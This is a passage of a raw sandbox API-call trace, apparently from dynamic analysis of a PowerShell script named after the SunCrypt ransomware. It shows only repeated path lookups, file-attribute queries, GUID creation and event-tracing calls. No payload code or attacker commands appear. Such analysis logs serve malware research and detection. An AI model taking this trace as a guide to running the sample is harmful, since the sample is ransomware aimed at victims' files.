lpOldMode=0x4ebeb48) returned 1 [0101.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.691] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701450745804) 
returned 1 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc19c7ec7, Data2=0xc397, Data3=0x46ff, Data4=([0]=0xbf, [1]=0xb6, [2]=0x63, [3]=0xb2, [4]=0xec, [5]=0x4, [6]=0x8f, [7]=0xcb))) returned 0x0 [0101.692] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.692] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.692] CoTaskMemFree (pv=0x4280e80) [0101.693] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701450912897) returned 1 [0101.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.807] 
SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.809] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701462543153) returned 1 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.810] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xabd306f2, Data2=0x7e8, Data3=0x49fa, Data4=([0]=0x8f, [1]=0x9c, [2]=0xc4, [3]=0xe7, [4]=0x2a, [5]=0x9d, [6]=0x59, [7]=0x56))) returned 0x0 [0101.810] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.810] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.810] CoTaskMemFree (pv=0x4280e80) [0101.810] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701462698191) returned 1 [0101.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.811] 
SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.811] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.813] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701462983646) returned 1 [0101.813] EtwEventActivityIdControl () returned 0x0 [0101.813] EtwEventActivityIdControl () returned 0x0 [0101.813] EtwEventActivityIdControl () returned 0x0 [0101.815] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x4e76a9eb, Data2=0x690b, Data3=0x45e6, Data4=([0]=0x9d, [1]=0x79, [2]=0x80, [3]=0x10, [4]=0x64, [5]=0xca, [6]=0xac, [7]=0x55))) returned 0x0 [0101.815] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.815] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.815] CoTaskMemFree (pv=0x4280e80) [0101.815] 
EtwEventActivityIdControl () returned 0x0 [0101.815] EtwEventActivityIdControl () returned 0x0 [0101.815] EtwEventActivityIdControl () returned 0x0 [0101.816] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701463248520) returned 1 [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0101.816] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) 
returned 0x3a [0101.819] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701463565253) returned 1 [0101.846] EtwEventActivityIdControl () returned 0x0 [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.849] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x9b672af4, Data2=0x6125, Data3=0x4ac4, Data4=([0]=0xba, [1]=0x83, [2]=0x76, [3]=0x54, [4]=0xee, [5]=0xd3, [6]=0x6, [7]=0xad))) returned 0x0 [0101.849] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.849] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.849] CoTaskMemFree (pv=0x4280e80) [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.850] EtwEventActivityIdControl () returned 0x0 [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0101.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, 
ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.889] EtwEventActivityIdControl () returned 0x0 [0101.945] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x57e68fc3, Data2=0xa75e, Data3=0x492e, Data4=([0]=0x82, [1]=0xad, [2]=0x31, [3]=0x73, [4]=0xd7, [5]=0x8, [6]=0xa6, [7]=0x1c))) returned 0x0 [0101.946] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.946] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.946] CoTaskMemFree (pv=0x4280e80) [0101.946] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701476292414) returned 1 [0101.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.947] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.947] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.947] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.949] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701476561438) returned 1 [0101.949] EtwEventActivityIdControl () returned 0x0 [0101.949] EtwEventActivityIdControl () returned 0x0 [0101.949] EtwEventActivityIdControl () returned 0x0 [0101.950] EtwEventActivityIdControl () returned 0x0 [0101.950] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xbd0ddf7f, Data2=0x48c2, Data3=0x43c9, Data4=([0]=0x93, [1]=0xf, [2]=0x3f, [3]=0x79, [4]=0x17, [5]=0xe7, [6]=0x24, [7]=0xe3))) returned 0x0 [0101.951] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.951] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.951] CoTaskMemFree (pv=0x4280e80) [0101.951] EtwEventActivityIdControl () returned 0x0 [0101.951] EtwEventActivityIdControl () returned 0x0 [0101.951] EtwEventActivityIdControl () returned 
0x0 [0101.952] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701476815898) returned 1 [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0101.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.954] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701477090666) returned 1 
[0102.212] EtwEventActivityIdControl () returned 0x0 [0102.215] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf84bca5f, Data2=0x26f8, Data3=0x441a, Data4=([0]=0x90, [1]=0x80, [2]=0x38, [3]=0x66, [4]=0xc9, [5]=0x35, [6]=0x2d, [7]=0x4))) returned 0x0 [0102.215] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.215] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.215] CoTaskMemFree (pv=0x4280e80) [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.216] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xed6c1487, Data2=0x7067, Data3=0x4318, Data4=([0]=0xa8, [1]=0x5a, [2]=0xe9, [3]=0x39, [4]=0xac, [5]=0x69, [6]=0xfa, [7]=0x3e))) returned 0x0 [0102.217] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.217] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.217] CoTaskMemFree (pv=0x4280e80) [0102.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, 
ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.223] EtwEventActivityIdControl () returned 0x0 [0102.223] EtwEventActivityIdControl () returned 0x0 [0102.223] EtwEventActivityIdControl () returned 0x0 [0102.224] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xcb1f8154, Data2=0x40c1, Data3=0x461f, Data4=([0]=0x8a, [1]=0x12, [2]=0x67, [3]=0xd0, [4]=0xeb, [5]=0x93, [6]=0x9b, [7]=0xca))) returned 0x0 [0102.224] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.224] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.224] CoTaskMemFree (pv=0x4280e80) [0102.224] EtwEventActivityIdControl () returned 0x0 [0102.224] EtwEventActivityIdControl () returned 0x0 [0102.225] EtwEventActivityIdControl () returned 0x0 [0102.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 
[0102.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0102.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 